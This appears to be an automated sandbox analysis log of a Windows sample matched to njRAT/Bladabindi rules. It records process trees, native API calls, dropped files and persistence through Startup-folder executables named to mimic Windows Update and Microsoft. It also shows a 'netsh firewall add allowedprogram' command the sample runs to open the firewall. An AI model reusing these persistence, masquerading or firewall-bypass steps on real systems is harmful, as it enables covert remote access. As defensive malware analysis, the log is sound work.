Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29958 NtClose,	14_2_00A29958
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A292AC NtQueryValueKey,	14_2_00A292AC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29A9C NtOpenFile,	14_2_00A29A9C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29AEF NtQueryAttributesFile,	14_2_00A29AEF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A292EC NtCreateKey,	14_2_00A292EC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A2922C NtOpenKey,	14_2_00A2922C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29236 NtEnumerateValueKey,	14_2_00A29236
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29278 NtQueryKey,	14_2_00A29278
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A293FE NtFlushKey,	14_2_00A293FE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A293C6 NtDeleteKey,	14_2_00A293C6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A293CE NtDeleteValueKey,	14_2_00A293CE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29334 NtEnumerateKey,	14_2_00A29334
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29374 NtSetValueKey,	14_2_00A29374
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A294A4 NtQueryMultipleValueKey,	14_2_00A294A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A294F8 NtReplaceKey,	14_2_00A294F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29438 NtLoadKey2,	14_2_00A29438
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29406 NtLoadKey,	14_2_00A29406
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29442 NtNotifyChangeKey,	14_2_00A29442
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A295A4 NtWriteFile,	14_2_00A295A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29586 NtTerminateProcess,	14_2_00A29586
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A295FC NtQueryObject,	14_2_00A295FC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29522 NtSaveKey,	14_2_00A29522
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29502 NtRestoreKey,	14_2_00A29502
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A2957E NtUnloadKey,	14_2_00A2957E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29540 NtSetInformationKey,	14_2_00A29540
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A28EA8 NtCreateThread,	14_2_00A28EA8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29698 NtQueryDirectoryFileEx,	14_2_00A29698
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29630 NtQueryDirectoryFile,	14_2_00A29630
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A297A6 NtDeleteFile,	14_2_00A297A6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A297AE NtLockFile,	14_2_00A297AE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A28FBC NtCreateUserProcess,	14_2_00A28FBC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A28F0B NtResumeThread,	14_2_00A28F0B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A2970C NtOpenSection,	14_2_00A2970C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29716 NtDuplicateObject,	14_2_00A29716
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A28F14 NtCreateProcess,	14_2_00A28F14
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29760 NtQueryVolumeInformationFile,	14_2_00A29760
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A28F64 NtCreateProcessEx,	14_2_00A28F64

Source: C:\Users\user\AppData\Local\Temp\server.exe

File created: C:\Windows\SysWOW64\Explower.exe

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_03624298	0_2_03624298
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Code function: 0_2_03624287	0_2_03624287
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 1_2_00AE6076	1_2_00AE6076
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 1_2_00AE6D00	1_2_00AE6D00
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD4290	4_2_02FD4290
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD427F	4_2_02FD427F
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD4628	4_2_02FD4628
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD4FF8	4_2_02FD4FF8
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD47CC	4_2_02FD47CC
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD4F95	4_2_02FD4F95
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD5367	4_2_02FD5367
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD4B53	4_2_02FD4B53
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD4F27	4_2_02FD4F27
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD4707	4_2_02FD4707
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD44E9	4_2_02FD44E9
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD50DB	4_2_02FD50DB
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD4C87	4_2_02FD4C87
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD5055	4_2_02FD5055
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD5451	4_2_02FD5451
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD49F1	4_2_02FD49F1
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD4995	4_2_02FD4995
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD453C	4_2_02FD453C
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_02FD492E	4_2_02FD492E
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 15_2_00A36076	15_2_00A36076
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 15_2_00A36D00	15_2_00A36D00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_00987000	21_2_00987000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_0099003A	21_2_0099003A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_0098A844	21_2_0098A844
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_0098F066	21_2_0098F066
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_009951D0	21_2_009951D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_0098E112	21_2_0098E112
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_00989BD0	21_2_00989BD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_00988B22	21_2_00988B22
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_00988B74	21_2_00988B74
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_00988D96	21_2_00988D96
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_009955CA	21_2_009955CA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_0098AE80	21_2_0098AE80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_00988F94	21_2_00988F94
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 22_2_00516076	22_2_00516076
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 22_2_00516D00	22_2_00516D00

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe

Code function: String function: 006202AC appears 51 times

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1608

Source: MyProg.exe.1.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2192046352.00000000014F5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenamemscorwks.dllT vs LisectAVT_2403002B_366.exe

Source: LisectAVT_2403002B_366.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan

Source: RRqyIX.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: RRqyIX.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: RRqyIX.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal100.spre.phis.troj.adwa.evad.winEXE@31/45@1/2

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 1_2_00AE119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,	1_2_00AE119F
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00D9BC86 AdjustTokenPrivileges,	4_2_00D9BC86
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00D9BC4F AdjustTokenPrivileges,	4_2_00D9BC4F
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 15_2_00A3119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,	15_2_00A3119F
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 22_2_0051119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,	22_2_0051119F

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe

Code function: 0_2_007A0914 GetDiskFreeSpaceExA,

0_2_007A0914

Source: C:\Users\user\AppData\Local\Temp\server.exe

File created: C:\Program Files (x86)\Explower.exe

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe

File created: C:\Users\user\AppData\Roaming\app

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:364:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\server.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\server.exe	Mutant created: \Sessions\1\BaseNamedObjects\8d9ba8e0d68a3d306883c186c2013957
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4888
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1372:120:WilError_03

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe

File created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe

File read: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe "C:\Users\user\Desktop\LisectAVT_2403002B_366.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process created: C:\Users\user\AppData\Local\Temp\server.exe "C:\Users\user\AppData\Local\Temp\server.exe"
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1608
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process created: C:\Users\user\AppData\Local\Temp\server.exe "C:\Users\user\AppData\Local\Temp\server.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" "

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: mswsock.dll	Jump to behavior
